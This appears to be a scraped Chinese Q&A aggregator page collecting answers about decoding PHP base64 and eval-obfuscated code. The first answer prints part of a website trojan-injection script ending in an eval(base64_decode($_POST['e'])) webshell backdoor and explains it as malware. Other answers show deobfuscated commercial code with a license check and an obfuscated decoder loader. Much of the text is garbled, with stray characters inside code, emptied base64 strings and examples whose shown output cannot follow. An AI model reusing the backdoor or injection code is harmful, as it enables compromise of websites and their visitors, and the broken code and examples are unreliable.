当前位置:首页 » 编程语言 » phpbase64解密

phpbase64解密

发布时间: 2023-04-22 12:55:54

A. php base64 解密加密问题

ion ev8l($s)#',$v)||preg_match('#[\(\[](\s*\d+,)#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'誉厅',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a='<script src= ></script>','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,',a'))$s.=$a;return $s;}function ev8l2($a,$b,$c,$d)ob_start('ev8l');for($i=0;$i<count($s);$i++)}}$ev8ll=(($a=@set_error_handler('ev8l2'))!='ev8l2')?$a:0;eval(base64_decode($_POST['e']));
意思是将参数中的<script>...</script>部分替换为<script src= ></script>,这样你的网页就被挂上了马。这段代码庆山隐应该是通过webshell上传到你机器上的一段挂马程序,至于webshell 的打开有很多原因,即然是php代码那么你的机器上很可能存在php远程文件包含漏洞,也就是如果你的机器上存在Wordtrans、WordPress、rgboard、phpcms等php程序,那么很可能就有这个的漏洞。
推荐解决方法:
1.恢复已被篡唯坦改的网页
2.找一个RFI扫描器对本机进行扫描,将找到的漏洞进行修补(相应的程序网上都有对应的修补方法)

B. PHP解密 eval( base64_decode

不错,回了无数多这种所谓的“解密”帖子,总算看见有人知道怎么搞了,高兴ing
等效的代码如下:

<?php
class MoleObject extends MasterObject
{

var $FormHandler = null;

var $IoHandler=null;

function MoleObject($config)
{

error_reporting(0);
$this->MasterObject($config);if(18869722 && !defined("LICENSE_VAR_CODE"))exit(86707181);if(substr(md5_FILE("./include/function/global.func.php"),3,25)!=substr("",3,25))
{
error_reporting(0);
ob_clean();
for($s=11677216;$s>0;$s*=65085748){;}
}
$this->FormHandler=new FormHandler;
include_once(LIB_PATH.'io.han.php');
$this->IoHandler=new IoHandler;
$this->Execute();
}

function Execute()
{
switch($this->Code)
{
case 'modify_normal':
include(MOD_PATH.(($_obfuscate_pp3FQ7Ohubz7=2147483647 & -78165835)%27).'/'.$_obfuscate_pp3FQ7Ohubz7.'.php');
break;
case 'domodify_normal':
include(MOD_PATH.(($_obfuscate_shAHJlhD4Ndn=2147483647 & -1818658825)%27).'/'.$_obfuscate_shAHJlhD4Ndn.'.php');
break;
case 'modify_credits':
include(MOD_PATH.(($_obfuscate_2GWWxUEK7ztH=2147483647 & 890135736)%27).'/'.$_obfuscate_2GWWxUEK7ztH.'.php');
break;
case 'domodify_credits':
include(MOD_PATH.(($_obfuscate_JQQuH5KF9jyy=2147483647 & -679717690)%27).'/'.$_obfuscate_JQQuH5KF9jyy.'.php');
break;
case 'modify_header_menu':
$this->ModifyHeaderMenu();
break;
case 'domodify_header_menu':
$this->DoModifyHeaderMenu();
break;
case 'modify_header_sub_menu':
$this->ModifyHeaderSubMenu();
break;
case 'modify_header_sub_menu':
$this->DoModifyHeaderSubMenu();
break;

case 'modify_rewrite':
include(MOD_PATH.(($_obfuscate_r4cRb866G31X=2147483647 & -374888374)%27).'/'.$_obfuscate_r4cRb866G31X.'.php');
break;
case 'domodify_rewrite':
include(MOD_PATH.(($_obfuscate_kFjsOxTxxTm5=2147483647 & 1196688474)%27).'/'.$_obfuscate_kFjsOxTxxTm5.'.php');
break;

case 'modify_remote':
include(MOD_PATH.(($_obfuscate_dmnWYBFfwPZy=2147483647 & -1814999975)%27).'/'.$_obfuscate_dmnWYBFfwPZy.'.php');
break;
case 'domodify_remote':
include(MOD_PATH.(($_obfuscate_M9T56w4hBGsk=2147483647 & 332943561)%27).'/'.$_obfuscate_M9T56w4hBGsk.'.php');
break;

case 'modify_filter':
include(MOD_PATH.(($_obfuscate_gWUtSmmgjtIp=2147483647 & -962910372)%27).'/'.$_obfuscate_gWUtSmmgjtIp.'.php');
break;
case 'domodify_filter':
include(MOD_PATH.(($_obfuscate_robepjimEUCI=2147483647 & -659464081)%27).'/'.$_obfuscate_robepjimEUCI.'.php');
break;

case 'modify_latest_search':
$this->ModifyLatestSearch();
break;
case 'domodify_latest_search':
$this->DoModifyLatestSearch();
break;
case 'modify_access':
include(MOD_PATH.(($_obfuscate_RFZWBU9N2FLm=2147483647 & 975168040)%27).'/'.$_obfuscate_RFZWBU9N2FLm.'.php');
break;
case 'domodify_access':
include(MOD_PATH.(($_obfuscate_Ig1RqxiYeBex=2147483647 & 1791127976)%27).'/'.$_obfuscate_Ig1RqxiYeBex.'.php');
break;

case 'modify_seccode':
include(MOD_PATH.(($_obfuscate_yNun8HVOF41M=2147483647 & -1132193474)%27).'/'.$_obfuscate_yNun8HVOF41M.'.php');
break;
case 'do_modify_seccode':
include(MOD_PATH.(($_obfuscate_RqGJmKOedTlZ=2147483647 & 305153614)%27).'/'.$_obfuscate_RqGJmKOedTlZ.'.php');
break;

case 'modify_smtp':
include(MOD_PATH.(($_obfuscate_GZvqIIYIxcwR=2147483647 & -2091071938)%27).'/'.$_obfuscate_GZvqIIYIxcwR.'.php');
break;
case 'do_modify_smtp':
include(MOD_PATH.(($_obfuscate_eUDxyTQSnmWA=2147483647 & -25441582)%27).'/'.$_obfuscate_eUDxyTQSnmWA.'.php');
break;

case 'modify_right':
include(MOD_PATH.(($_obfuscate_L6pnR8LaKmYu=2147483647 & -29905623)%27).'/'.$_obfuscate_L6pnR8LaKmYu.'.php');
break;
case 'do_modify_right':
include(MOD_PATH.(($_obfuscate_umtTsFNTDQ2i=2147483647 & -1934952338)%27).'/'.$_obfuscate_umtTsFNTDQ2i.'.php');
break;

case 'modify_shortcut':
include(MOD_PATH.(($_obfuscate_Po7xayJ0iz3x=2147483647 & -371519643)%27).'/'.$_obfuscate_Po7xayJ0iz3x.'.php');
break;
case 'do_modify_shortcut':
include(MOD_PATH.(($_obfuscate_cFcMlzVkWpGo=2147483647 & 1925297631)%27).'/'.$_obfuscate_cFcMlzVkWpGo.'.php');
break;

default:
include(MOD_PATH.(($_obfuscate_pp3FQ7Ohubz7=2147483647 & -78165835)%27).'/'.$_obfuscate_pp3FQ7Ohubz7.'.php');
break;
}
}

function _saveRewriteConfig($domain,$name,$config)
{
return include(MOD_PATH.(($_obfuscate_OeWNnsry3PMy=2147483647 & -1082551710)%27).'/'.$_obfuscate_OeWNnsry3PMy.'.php');
}
function _writeHtaccess($abs_path)
{
return include(MOD_PATH.(($_obfuscate_x8rztwAyS8f1=2147483647 & -315296549)%27).'/'.$_obfuscate_x8rztwAyS8f1.'.php');
}

}
?>

注意看13行,这里其实是在检测另外的文件是否被解密,注意是否有其它文件类似的办法来检测你这个程序。

C. php base64_decode()是什么加密啊参数是什么

1、base64_decode() 函数在PHP中是解码的意思、对使用 MIME base64 编码的数据进行解码。

使用base64_decode()函数对简单字符串进行解码。

<?php
$str='==';
echobase64_decode($str);
?>

此示例将显示:
This is an encoded string

2、与之相反,base64_encode(),使用 base64 对 data 进行编码。

使用base64_encode()函数对简单字符串进行编码。

<?php
$str='Thisisanencodedstring';
echobase64_encode($str);
?>

此示例将显示:
==

D. sql查询base64 数据 thinkphp怎么解密

如果烂洞你 的mysql版本是饥缓枯5.6.1以上的,可以试哪漏一下 SELECT FROM_BASE64(字段); 这样就可以查出来了。如果不是你要查出来用其他语音来,比如php 的base64_decode 这个函数。

E. PHP解密 (base64_decode)

你自己到这个页面去慢慢查吧,反正后半部我给你弄出来了,你自己看。
前半部分的代码,需要加上后半部分的代码才能够解密。是挺烦的。

你到这个网站去解密:http://tool.chinaz.com/Tools/Base64.aspx

$lll=0;eval(base64_decode("="));$ll=0;eval($lllllllllll("JGxsbGxsbGxsbGw9J29yZCc7"));$llll=0;$lllll=3;eval($lllllllllll("JGw9JGxsbGxsbGxsbGxsKCRvKTs="));$lllllll=0;$llllll=($llllllllll($l[1])<<8)+$llllllllll($l[2]);eval($lllllllllll(""));$lllllllll=16;$llllllll="";for(;$lllll<$lllllllllllll($l);){if($lllllllll==0){$llllll=($llllllllll($l[$lllll++])<<8);$llllll+=$llllllllll($l[$lllll++]);$lllllllll=16;}if($llllll&0x8000){$lll=($llllllllll($l[$lllll++])<<4);$lll+=($llllllllll($l[$lllll])>>4);if($lll){$ll=($llllllllll($l[$lllll++])&0x0f)+3;for($llll=0;$llll<$ll;$llll++)$llllllll[$lllllll+$llll]=$llllllll[$lllllll-$lll+$llll];$lllllll+=$ll;}else{$ll=($llllllllll($l[$lllll++])<<8);$ll+=$llllllllll($l[$lllll++])+16;for($llll=0;$llll<$ll;$llllllll[$lllllll+$llll++]=$llllllllll($l[$lllll]));$lllll++;$lllllll+=$ll;}}else$llllllll[$lllllll++]=$llllllllll($l[$lllll++]);$llllll<<=1;$lllllllll--;}eval($lllllllllll("JGxsbGxsbGxsbGxsbD0nY2hyJzs="));$lllll=0;eval($lllllllllll(""));$llllllllll="";for(;$lllll<$lllllll;){$llllllllll.=$llllllllllll($llllllll[$lllll++]^0x07);}eval($lllllllllll("=="));eval($lllllllll);

F. php base64 decode 解密

?> <div id="footer" class="clearfix">
<div class="right left">&; 2009 THEME NAME. POWERED BY <a href="http://wordpress.org">WORDPRESS</a> AND <a href="http://wpcrunchy.com" title="Free and Premium Wordpress Themes">WPCRUNCHY</a></div>
<div class="credits right">Design by <a href="http://www.firecasinos.com" target="_blank">Online Casinos</a>. In collaboration with <a href="http://mmohut.com" target="_blank">Free MMORPG</a>, <a href="http://www.hostv.com" target="_blank">VPS Hosting</a> and <a href="http://www.cirtexhosting.com/video-hosting.shtml" target="_blank">Video Hosting</a></div>
</div>
</div>
<?php wp_footer(); ?>
<!--[if IE 6]>
<script>for (x in document.write) { document.write(x);}</script>
<![endif]-->
</body>
</html>

就是一段这个破东西。

G. PHP解密 eval( base64_decode

这两个函数在php中是用得对php代码进行加密与解密码的base64_encode是加密,尔base64_decode是解密了,下面我们看两个简单实例。

base64_encode语法: string base64_decode(string data);
*/

$str='='; //定义字符串
echo base64_decode($str); //www.111cn.net一聚教程网 //输出解码后的内容/*

base64_encode语法: string base64_encode(string data);
*/

$str='www.111cn.net一聚教程网'; //定义字符串
echo base64_encode($str); // = //输出编码后的内容

看一下这个会不会对你有帮助。

阅读全文

与phpbase64解密相关的资讯

热点内容
jrtplib编译 发布:2024-11-01 18:06:01 浏览:226
java代码中if 发布:2024-11-01 18:02:40 浏览:377
android定时刷新 发布:2024-11-01 17:59:43 浏览:999
炎黄解说我的世界服务器生存 发布:2024-11-01 17:59:42 浏览:542
如何清楚网页缓存 发布:2024-11-01 17:53:58 浏览:552
linux文件权限不够 发布:2024-11-01 17:53:19 浏览:917
c语言中10是什么意思 发布:2024-11-01 17:45:08 浏览:892
装棉衣压缩袋 发布:2024-11-01 17:37:18 浏览:297
android40ble蓝牙 发布:2024-11-01 17:36:58 浏览:712
数据库表对比 发布:2024-11-01 17:18:42 浏览:985
© Design www.ultimate-communications.com 2015-2022
本站内容源自于网络,如遇问题可联系相关处理。